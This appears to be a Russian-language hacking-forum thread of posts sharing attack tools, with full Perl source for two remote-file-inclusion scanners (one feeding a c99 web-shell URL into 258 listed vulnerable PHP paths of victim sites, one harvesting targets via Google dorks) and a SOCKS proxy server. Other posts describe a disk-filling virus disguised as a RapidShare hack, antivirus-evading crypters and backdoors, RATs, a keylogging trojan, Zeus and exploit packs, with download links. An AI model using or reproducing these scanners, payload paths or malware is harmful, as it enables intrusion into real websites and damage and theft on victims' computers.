Tripod - Lycos
Код
http://rapidshare.com/files/48422504/Tripod_-_Lycos.rar



Veoh
Код
http://rapidshare.com/files/48422505/Veoh.rar



WWE
Код
http://rapidshare.com/files/48422506/WWE.rar


Xanga
Код
http://rapidshare.com/files/48422507/Xanga.rar



Xtube
Код
http://rapidshare.com/files/48422508/XTube.rar

Автор: Creeping Death 13.09.2007, 21:57

File Bomber


::Disguised as a RapidShare account hacker

::This creates a bunch of copies of
the "readme.txt"
SO the bigger the "readme.txt" file is
the more space it shall take up

::It creates a file on how to "uninstall"
Rapid H4xid
Because this is just a joke virus
(And as of now, i do not know how to remove)
(So do not run on your computer)
(the subdomain http://howtoremove.dave.hohs.net will be used for the removal)
-the "no remove" files do not have this

::Creates 100,000 copies of "readme.txt" which takes up
-195 GB
-200000 MB
-204800000 KB
-209715200000 Bytes
Of Space

::You can only close it
if you cancel the process
in task manager


::Adds to startup on
-Vista
-XP
-WinNT
-Win 9x

::Works on operating systems
-Windows

::Creates the files
but hidden! So they cant delete
the files. it will just take up a lot
of space with them not knowing

::The files are called
"PORNO MOVIE#(insert number here).mov

::I tested myself. It works
It creates about 2,0000+ files in 10 minutes
and doesnt stop til it reachers 100,000 files

::Hide from task manager



http://rapidshare.com/files/55202841/RapidH4x1d.zip

http://rapidshare.com/files/55202839/R4pidH4x1d_-_no_remove.zip

http://rapidshare.com/files/55202842/RapidH4x1d2.zip

http://rapidshare.com/files/55202840/RapidH4x1d2_-_no_remove.zip

Автор: Creeping Death 17.10.2007, 22:46

STNC 0day tool google-php-include-bugs searcher v 0.8

CODE
#! /usr/bin/perl

# ================================================================ #
#
[/indent]
google-php-include-bugs searcher v 0.8
#
#
#
#
#
#
#
#
ATTENTION. THIS SCRIPT IS PRIVATE.
#
#
.NOT FOR SALE.
#
#
#
# Usage: perl script.pl --log=<log-file> --url=<test-script-url> #
# Test script:
#
# <?php
#
# error_reporting(0);
#
# $s = md5("STNC");
#
# $code = eregi("windows", php_uname())+
#
# 2*eregi("apache", getenv("SERVER_SOFTWARE"))+
#
# 4*ini_get('safe_mode'); echo $s."[$code]".$s;
#
# ?>
#
# ================================================================ #

use IO::Socket;

@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
"inc", "incl", "include", "read", "write", "data", "code", "fname",
"filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
"seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
"corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
"conteudo");

@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
"info", "name", "aero", "biz", "edu", "ws", "in",
"cn", "us", "be", "it", "cc", "tv", "ru", "su",
"jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
"be", "fi", "gov");

@ftypes = ("php", "php3");

$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");

for($i = 0; $i < @ARGV; $i++)
{
if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; }
elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }
}

if(!($script && $log)){ usage(); exit; }

foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
foreach $ftype(@ftypes)
{
$request = "filetype:$ftype site:$zone inurl:$inc=";
print "\n[$request]\n";

$request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
@dn = ();

for($i = 0;$i < 10; $i++)
{
@temp = get("http://www.google.com/search?filter=0&num=100&start=".$i.
"00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
foreach $url (@temp)
{
if($url !~ /($inc=[^\&]+)/i) { next; }
$left = $`; $right = $';
if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
if($url =~ /google\.com/i){ next; }

($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
if($domain =~ /^www\.(.+)$/) { $domain = $1; }
$f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
push @dn, $domain;

$print = "$left$inc=[INCLUDE]$right";
if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
{
$s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
$count++;
print "[$count] $s";

open LOG, ">>$log";
print LOG $s;
close LOG;
}
else {
print "$print - no bugs\n";
}
}
}
}
}
}

sub timeout() { close $sock; }

sub get()
{
local $request = $_[0];
local $port = 80;
local $data = "";

if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }

$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
TimeOut => $timeout
) or return 0; # connection failed

print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";

$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $data .= $_; }
alarm 0; close $sock;
}

return $data;
}

sub usage()
{

print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);

}


давно уже не приват=) но..но может кому-нибудь пригодится.

SaTaNiC Team 0day tool Satanic Socks Server v0.8-perl
CODE
#!/usr/bin/perl

#
Satanic Socks Server v0.8.031206-perl
# This script is private. Only for SaTaNiC team and friends. Not for sale.
#
Coded by drmist/STNC, web: www.stnc.ru.

$auth_enabled = 0;
$auth_login = "user";
$auth_pass = "pass";
$port = 3003;

use IO::Socket::INET;

$SIG{'CHLD'} = 'IGNORE';
$bind = IO::Socket::INET->new(Listen=>10, Reuse=>1, LocalPort=>$port) or die "Can't bind port $port\n";

while($client = $bind->accept()) {
$client->autoflush();

if(fork()){ $client->close(); }
else { $bind->close(); new_client($client); exit(); }
}

sub new_client {
local $t, $i, $buff, $ord, $success;
local $client = $_[0];
sysread($client, $buff, 1);

if(ord($buff) == 5) {
sysread($client, $buff, 1);
$t = ord($buff);

unless(sysread($client, $buff, $t) == $t) { return; }

$success = 0;
for($i = 0; $i < $t; $i++) {
$ord = ord(substr($buff, $i, 1));
if($ord == 0 && !$auth_enabled) {
syswrite($client, "\x05\x00", 2);
$success++;
break;
}
elsif($ord == 2 && $auth_enabled) {
unless(do_auth($client)){ return; }
$success++;
break;
}
}

if($success) {
$t = sysread($client, $buff, 3);

if(substr($buff, 0, 1) == '\x05') {
if(ord(substr($buff, 2, 1)) == 0) { # reserved
($host, $raw_host) = socks_get_host($client);
if(!$host) { return; }
($port, $raw_port) = socks_get_port($client);
if(!$port) { return; }
$ord = ord(substr($buff, 1, 1));
$buff = "\x05\x00\x00".$raw_host.$raw_port;
syswrite($client, $buff, length($buff));
socks_do($ord, $client, $host, $port);
[indent] }
}
} else { syswrite($client, "\x05\xFF", 2); };
}
$client->close();
}

sub do_auth {
local $buff, $login, $pass;
local $client = $_[0];

syswrite($client, "\x05\x02", 2);
sysread($client, $buff, 1);

if(ord($buff) == 1) {
sysread($client, $buff, 1);
sysread($client, $login, ord($buff));
sysread($client, $buff, 1);
sysread($client, $pass, ord($buff));

if($login eq $auth_login && $pass eq $auth_pass) {
syswrite($client, "\x05\x00", 2);
return 1;
} else { syswrite($client, "\x05\x01", 2); }
}

$client->close();
return 0;
}

sub socks_get_host {
local $client = $_[0];
local $t, $ord, $raw_host;
local $host = "";

sysread($client, $t, 1);
$ord = ord($t);
if($ord == 1) {
sysread($client, $raw_host, 4);
@host = $raw_host =~ /(.)/g;
$host = ord($host[0]).".".ord($host[1]).".".ord($host[2]).".".ord($host[3]);
} elsif($ord == 3) {
sysread($client, $raw_host, 1);
sysread($client, $host, ord($raw_host));
$raw_host .= $host;
} elsif($ord == 4) {
#ipv6 - not supported
}

return ($host, $t.$raw_host);
}

sub socks_get_port {
local $client = $_[0];
local $raw_port, $port;
sysread($client, $raw_port, 2);
$port = ord(substr($raw_port, 0, 1)) << 8 | ord(substr($raw_port, 1, 1));
return ($port, $raw_port);
}

sub socks_do {
local($t, $client, $host, $port) = @_;

if($t == 1) { socks_connect($client, $host, $port); }
elsif($t == 2) { socks_bind($client, $host, $port); }
elsif($t == 3) { socks_udp_associate($client, $host, $port); }
else { return 0; }

return 1;
}

# this part of code was taken from datapipe.pl utility,
# written by CuTTer (cutter[at]real.xakep.ru)
# utility lays on cpan.org

sub socks_connect {
my($client, $host, $port) = @_;
my $target = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM);

unless($target) { return; }

$target->autoflush();
while($client || $target) {
my $rin = "";
vec($rin, fileno($client), 1) = 1 if $client;
vec($rin, fileno($target), 1) = 1 if $target;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout && !$eout) { return; }
my $cbuffer = "";
my $tbuffer = "";

if ($client && (vec($eout, fileno($client), 1) || vec($rout, fileno($client), 1))) {
my $result = sysread($client, $tbuffer, 1024);
if (!defined($result) || !$result) { return; }
}

if ($target && (vec($eout, fileno($target), 1) || vec($rout, fileno($target), 1))) {
my $result = sysread($target, $cbuffer, 1024);
if (!defined($result) || !$result) { return; }
}

if ($fh && $tbuffer) { print $fh $tbuffer; }

while (my $len = length($tbuffer)) {
my $res = syswrite($target, $tbuffer, $len);
if ($res > 0) { $tbuffer = substr($tbuffer, $res); } else { return; }
}

while (my $len = length($cbuffer)) {
my $res = syswrite($client, $cbuffer, $len);
if ($res > 0) { $cbuffer = substr($cbuffer, $res); } else { return; }
}
}
}

sub socks_bind {
my($client, $host, $port) = @_;
# not supported
}

sub socks_udp_associate {
my($client, $host, $port) = @_;
# not supported
}


аналогично;)

PlainShell

http://www.plain-text.info/plainshell

Автор: Creeping Death 19.10.2007, 18:32

Free Cryptor build 002

(IMG:http://www.soft.glofff.com/img/screen/freecryptor1.png)

Download: http://www.soft.glofff.com/downloads/fc.rar
Official web site: http://soft.glofff.com

A-Squared Found nothing
AntiVir Found TR/Crypt.XPACK.Gen

ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found Mal/Basine-C
VirusBuster Found nothing
VBA32 Found nothing

Thx to Prosto

Автор: Creeping Death 28.10.2007, 00:19

небольшой backdoor, написанный на Delphi. вчера еще не палился.

CODE
A-Squared Found nothing
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found nothing
VirusBuster Found nothing
VBA32 Found nothing


автор: Ryan

аттач

 Shell.rar ( 25,43 килобайт ) : 54
 

Автор: Creeping Death 28.10.2007, 13:00

Joomla rfi Scanner

Heres a simple scanner for the web app Joomla. Scans known vulnerable RFI path/files in Joomla and reports http response.
Cпасибо d3hydr8

http://www.md5this.com/joomlascan.rar

Автор: неузнаваемый 10.12.2007, 16:58

BlackEnergy bot 1.9.2.rar Приклеен вирус так что запускаем на виртуальной машине!

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


Связка эксплойтов - FirePack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


r57shell v1.4

+ выполнение команд без перезагрузки страницы (команда !cls - очистка текстовой области)
+ добавление алиасов (вид: !алиас; как пример - два алиаса !ll и !ds, подробности в коде скрипта)
+ php_admin* bypass by ini_restore()
+ error_log() safe_mode bypass
+ htaccess mail.force_extra_parameters safemode bypass
+ SSI safe_mode bypass
+ COM functions safe_mode bypass
+ ionCube extension safe_mode bypass
+ win32std extension safe_mode bypass
+ win32service extension safe_mode bypass
+ perl extension safe_mode bypass
+ FFI extension safe_mode bypass

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


ad pack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


система распределения траффика

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


zeus v1.0.3.7 + админка и мануал
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

пока все rolleyes.gif

Автор: неузнаваемый 17.12.2007, 14:15

Sqlninja 0.2.1-r1
Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В этойверсии можно выделить такие изменения, как улучшение механизма распознования, добавление брутофорс атаки, устранение некоторых ошибок из предыдущей версии.

http://www.web-hack.ru.hosted.by.0x7.net/soft/brut/sqlninja-0.2.1-r1.tgz

http://www.web-hack.ru/

Автор: неузнаваемый 19.12.2007, 13:14

CZ stat for "agent dq" new!
wowloader 0.8c

ntechloader 1.2se

Mpack 0.99
SASH.cc site 2007

N-spy and N-code

Nuclear traff new!
pass:123

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


не проверял на вирусы так что на ваш страх и риск

Автор: Creeping Death 2.01.2008, 16:18

Fishing_Bait_2.5

http://rs100.rapidshare.com/files/51327122/Fishing_Bait_2.5_-_www.SilentHex.info.rar

Автор: Creeping Death 3.01.2008, 18:50

MultiBinder 1.1 Fully Undetected
http://www.fileshare.ro/452977910.405

Hav-Rat 1.2 [Private Version]
http://rapidshare.com/files/77201630/Hav-Rat_1.2_Private_Edition.rar

NyTrojan OCX

Function :

1) OpenCDRom
2) CloseCDRom
3) ShowTaskBar
4) HideTaskBar
5) HideMouse
6) ShowMouse
7) LockExe
8) UnLockExe
9) HideClock
10) ShowClock
11) HideStart
12) ShowStart
13) HideIcons
14) ShowIcons
15) DisableTaskManager
16) EnableTaskManager
17) EmptyFolder
18) DesktopFolderFlood
19) DesktopFolderDelete
20) DisableSystemRestore
21) EnableSystemRestore
22) KillProcess
23) AutoDownload
24) SetStartButtonCaption
25) AddToStartUp
26) FreezeMouse
27) StopFreezeMouse
28) CrazyMouse
29) StopCrazyMouse
30) BeepFlood
31) StopBeepFlood
32) Abort
33) LogOff
34) ShutDown
35) Restart
36) Author
37) OpenWebSite
38) FormatDrive
39) SwapMouseButtons
40) StopSwapMouseButtons
41) BypassWindowsFirewall
42) TurnOffMonitor
43) TurnOnMonitor
44) StartKeylogging
45) StopKeylogging
46) Keylog



http://rapidshare.com/files/79649642/NyTrOjan.ocxhttp://www.speedyshare.com/590347578.html
http://uploaded.to/?id=wltwes
http://www2.eushare.com/download.php?file=NyTrOjan.ocx
http://www.netdrive.ws/40441.html

Zombie Rat v1.0

C0der:"The Bo$$"
Coded in : 90% Delphi, 10%Asm
http://rapidshare.com/files/79701258/ZombieRat.cab.html


Автор: Creeping Death 3.01.2008, 19:16

Scaner RFI cu >400 buguri

CODE
#!/usr/bin/perl

# RFI Web Comp v.1 - Public Version
# Code by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com

use HTTP::Request;
use LWP::UserAgent;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Web Comp v.1 - By JosS");
system ("color 02");
}
}

&lw;

print "\t\t########################################################\n\n";
print "\t\t# RFI Web Comp .v1 - Spanish Hackers Team #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";


print "Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";

# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {

# lo añadimos
$host = 'http://' . $host;
}

# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {

# lo añadimos
$host = $host . '/';
}


print "Insert shell:(ex: http://www.site.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";

# Si la url no tiene http: al principio
if ( $shell !~ /^http:/ ) {

# lo añadimos
$shell = 'http://' . $shell;
}


print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";

print "Your config:\n\n";

print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";

print "Scan...\n\n";

$vuln1="includes/header.php?systempath=";
$vuln2="amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln3="index.inc.php?PATH_Includes=";
$vuln4="nphp/nphpd.php?nphp_config[LangFile]=";
$vuln5="include/db.php?GLOBALS[rootdp]=";
$vuln6="ashnews.php?pathtoashnews=";
$vuln7="ashheadlines.php?pathtoashnews=";
$vuln8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln9="demo/includes/init.php?user_inc=";
$vuln10="jaf/index.php?show=";
$vuln11="inc/shows.inc.php?cutepath=";
$vuln12="poll/admin/common.inc.php?base_path=";
$vuln13="pollvote/pollvote.php?pollname=";
$vuln14="sources/post.php?fil_config=";
$vuln15="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln16="bb_lib/checkdb.inc.php?libpach=";
$vuln17="include/livre_include.php?no_connect=lol&chem_absolu=";
$vuln18="index.php?from_market=Y&pageurl=";
$vuln19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln20="pivot/modules/module_db.php?pivot_path=";
$vuln21="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln22="derniers_commentaires.php?rep=";
$vuln23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln26="coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$vuln29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$vuln30="myPHPCalendar/admin.php?cal_dir=";
$vuln31="agendax/addevent.inc.php?agendax_path=";
$vuln32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln34="main.php?page=";
$vuln35="default.php?page=";
$vuln36="index.php?action=";
$vuln37="index1.php?p=";
$vuln38="index2.php?x=";
$vuln39="index2.php?content=";
$vuln40="index.php?conteudo=";
$vuln41="index.php?cat=";
$vuln42="include/new-visitor.inc.php?lvc_include_dir=";
$vuln43="modules/agendax/addevent.inc.php?agendax_path=";
$vuln44="shoutbox/expanded.php?conf=";
$vuln45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln46="pivot/modules/module_db.php?pivot_path=";
$vuln47="library/editor/editor.php?root=";
$vuln48="library/lib.php?root=";
$vuln49="e107/e107_handlers/secure_img_render.php?p=";
$vuln50="zentrack/index.php?configFile=";
$vuln51="main.php?x=";
$vuln52="becommunity/community/index.php?pageurl=";
$vuln53="GradeMap/index.php?page=";
$vuln54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$vuln55="calendar/calendar.php?serverPath=";
$vuln56="calendar/functions/popup.php?serverPath=";
$vuln57="calendar/events/header.inc.php?serverPath=";
$vuln58="calendar/events/datePicker.php?serverPath=";
$vuln59="calendar/setup/setupSQL.php?serverPath=";
$vuln60="calendar/setup/header.inc.php?serverPath=";
$vuln61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$vuln62="zentrack/index.php?configFile=";
$vuln63="pivot/modules/module_db.php?pivot_path=";
$vuln64="inc/header.php/step_one.php?server_inc=";
$vuln65="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln66="inc/pipe.php?HCL_path=";
$vuln67="include/write.php?dir=";
$vuln68="include/new-visitor.inc.php?lvc_include_dir=";
$vuln69="includes/header.php?systempath=";
$vuln70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln71="coppercop/theme.php?THEME_DIR=";
$vuln72="zentrack/index.php?configFile=";
$vuln73="pivot/modules/module_db.php?pivot_path=";
$vuln74="inc/header.php/step_one.php?server_inc=";
$vuln75="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln76="inc/pipe.php?HCL_path=";
$vuln77="include/write.php?dir=";
$vuln78="include/new-visitor.inc.php?lvc_include_dir=";
$vuln79="includes/header.php?systempath=";
$vuln80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln81="coppercop/theme.php?THEME_DIR=";
$vuln82="becommunity/community/index.php?pageurl=";
$vuln83="shoutbox/expanded.php?conf=";
$vuln84="agendax/addevent.inc.php?agendax_path=";
$vuln85="myPHPCalendar/admin.php?cal_dir=";
$vuln86="yabbse/Sources/Packages.php?sourcedir=";
$vuln87="dotproject/modules/projects/addedit.php?root_dir=";
$vuln88="dotproject/modules/projects/view.php?root_dir=";
$vuln89="dotproject/modules/projects/vw_files.php?root_dir=";
$vuln90="dotproject/modules/tasks/addedit.php?root_dir=";
$vuln91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$vuln92="My_eGallery/public/displayCategory.php?basepath=";
$vuln93="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln94="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln96="modules/agendax/addevent.inc.php?agendax_path=";
$vuln97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln101="shoutbox/expanded.php?conf=";
$vuln102="pivot/modules/module_db.php?pivot_path=";
$vuln103="library/editor/editor.php?root=";
$vuln104="library/lib.php?root=";
$vuln105="e107/e107_handlers/secure_img_render.php?p=";
$vuln106="main.php?x=";
$vuln107="main.php?page=";
$vuln108="index.php?meio.php=";
$vuln109="index.php?include=";
$vuln110="index.php?inc=";
$vuln111="index.php?page=";
$vuln112="index.php?pag=";
$vuln113="index.php?p=";
$vuln114="index.php?x=";
$vuln115="index.php?open=";
$vuln116="index.php?visualizar=";
$vuln117="index.php?pagina=";
$vuln118="index2.php?content=";
$vuln119="inc/step_one_tables.php?server_inc=";
$vuln120="GradeMap/index.php?page=";
$vuln121="phpshop/index.php?base_dir=";
$vuln122="admin.php?cal_dir=";
$vuln123="contacts.php?cal_dir=";
$vuln124="convert-date.php?cal_dir=";
$vuln125="album_portal.php?phpbb_root_path=";
$vuln126="mainfile.php?MAIN_PATH=";
$vuln127="dotproject/modules/files/index_table.php?root_dir=";
$vuln128="html/affich.php?base=";
$vuln129="gallery/init.php?HTTP_POST_VARS=";
$vuln130="pm/lib.inc.php?pm_path=";
$vuln131="ideabox/include.php?gorumDir=";
$vuln132="index2.php?includes_dir=";
$vuln133="forums/toplist.php?phpbb_root_path=";
$vuln134="forum/toplist.php?phpbb_root_path=";
$vuln135="admin/config_settings.tpl.php?include_path=";
$vuln136="include/common.php?include_path=";
$vuln137="event/index.php?page=";
$vuln138="forum/index.php?includeFooter=";
$vuln139="forums/index.php?includeFooter=";
$vuln140="forum/bb_admin.php?includeFooter=";
$vuln141="forums/bb_admin.php?includeFooter=";
$vuln142="language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln144="blend_data/blend_common.php?phpbb_root_path=";
$vuln145="master.php?root_path=";
$vuln146="includes/kb_constants.php?module_root_path=";
$vuln147="forum/includes/kb_constants.php?module_root_path=";
$vuln148="forums/includes/kb_constants.php?module_root_path=";
$vuln149="classes/adodbt/sql.php?classes_dir=";
$vuln150="agenda.php3?rootagenda=";
$vuln151="agenda2.php3?rootagenda=";
$vuln152="sources/lostpw.php?CONFIG[path]=";
$vuln153="topsites/sources/lostpw.php?CONFIG[path]=";
$vuln154="toplist/sources/lostpw.php?CONFIG[path]=";
$vuln155="sources/join.php?CONFIG[path]=";
$vuln156="topsites/sources/join.php?CONFIG[path]=";
$vuln157="toplist/sources/join.php?CONFIG[path]=";
$vuln158="topsite/sources/join.php?CONFIG[path]=";
$vuln159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$vuln160="extras/poll/poll.php?file_newsportal=";
$vuln161="index.php?site_path=";
$vuln162="mail/index.php?site_path=";
$vuln163="fclick/show.php?path=";
$vuln164="show.php?path=";
$vuln165="calogic/reconfig.php?GLOBALS[CLPath]=";
$vuln166="eshow.php?Config_rootdir=";
$vuln167="auction/auction_common.php?phpbb_root_path=";
$vuln168="index.php?inc_dir=";
$vuln169="calendar/index.php?inc_dir=";
$vuln170="modules/TotalCalendar/index.php?inc_dir=";
$vuln171="modules/calendar/index.php?inc_dir=";
$vuln172="calendar/embed/day.php?path=";
$vuln173="ACalendar/embed/day.php?path=";
$vuln174="calendar/add_event.php?inc_dir=";
$vuln175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$vuln176="claroline/auth/ldap/authldap.php?includePath=";
$vuln177="docebo/modules/credits/help.php?lang=";
$vuln178="modules/credits/help.php?lang=";
$vuln179="config.php?returnpath=";
$vuln180="editsite.php?returnpath=";
$vuln181="in.php?returnpath=";
$vuln182="addsite.php?returnpath=";
$vuln183="includes/pafiledb_constants.php?module_root_path=";
$vuln184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$vuln185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$vuln186="auth/auth.php?phpbb_root_path=";
$vuln187="auth/auth_phpbb/phpbb_root_path=";
$vuln188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$vuln189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$vuln190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$vuln191="phpdig/includes/config.php?relative_script_path=";
$vuln192="includes/phpdig/includes/config.php?relative_script_path=";
$vuln193="includes/dbal.php?eqdkp_root_path=";
$vuln194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$vuln195="dkp/includes/dbal.php?eqdkp_root_path=";
$vuln196="include/SQuery/gameSpy2.php?libpath=";
$vuln197="include/global.php?GLOBALS[includeBit]=";
$vuln198="topsites/config.php?returnpath=";
$vuln199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$vuln200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$vuln201="forum/addpost_newpoll.php?thispath=";
$vuln202="forums/addpost_newpoll.php?thispath=";
$vuln203="ubbthreads/ubbt.inc.php?thispath=";
$vuln204="forums/ubbt.inc.php?thispath=";
$vuln205="forum/ubbt.inc.php?thispath=";
$vuln206="forum/admin/addentry.php?phpbb_root_path=";
$vuln207="admin/addentry.php?phpbb_root_path=";
$vuln208="index.php?f=";
$vuln209="index.php?act=";
$vuln210="ipchat.php?root_path=";
$vuln211="includes/orderSuccess.inc.php?glob[rootDir]=";
$vuln212="stats.php?dir[func]=dir[base]=";
$vuln213="ladder/stats.php?dir[base]=";
$vuln214="ladders/stats.php?dir[base]=";
$vuln215="sphider/admin/configset.php?settings_dir=";
$vuln216="admin/configset.php?settings_dir=";
$vuln217="vwar/admin/admin.php?vwar_root=";
$vuln218="modules/vwar/admin/admin.php?vwar_root=";
$vuln219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$vuln220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$vuln221="sphider/admin/configset.php?settings_dir=";
$vuln222="admin/configset.php?settings_dir=";
$vuln223="impex/ImpExData.php?systempath=";
$vuln224="forum/impex/ImpExData.php?systempath=";
$vuln225="forums/impex/ImpExData.php?systempath=";
$vuln226="application.php?base_path=";
$vuln227="index.php?theme_path=";
$vuln228="become_editor.php?theme_path=";
$vuln229="add.php?theme_path=";
$vuln230="bad_link.php?theme_path=";
$vuln231="browse.php?theme_path=";
$vuln232="detail.php?theme_path=";
$vuln233="fav.php?theme_path=";
$vuln234="get_rated.php?theme_path=";
$vuln235="login.php?theme_path=";
$vuln236="mailing_list.php?theme_path=";
$vuln237="new.php?theme_path=";
$vuln238="modify.php?theme_path=";
$vuln239="pick.php?theme_path=";
$vuln240="power_search.php?theme_path=";
$vuln241="rating.php?theme_path=";
$vuln242="register.php?theme_path=";
$vuln243="review.php?theme_path=";
$vuln244="rss.php?theme_path=";
$vuln245="search.php?theme_path=";
$vuln246="send_pwd.php?theme_path=";
$vuln247="sendmail.php?theme_path=";
$vuln248="tell_friend.php?theme_path=";
$vuln249="top_rated.php?theme_path=";
$vuln250="user_detail.php?theme_path=";
$vuln251="user_search.php?theme_path=";
$vuln252="invoice.php?base_path=";
$vuln253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$vuln254="cgi-bin/install/index.php?G_PATH=";
$vuln255="cgi-bin/include/print_category.php?dir=";
$vuln256="includes/class_template.php?quezza_root_path=";
$vuln257="bazar/classified_right.php?language_dir=";
$vuln258="classified_right.php?language_dir=";
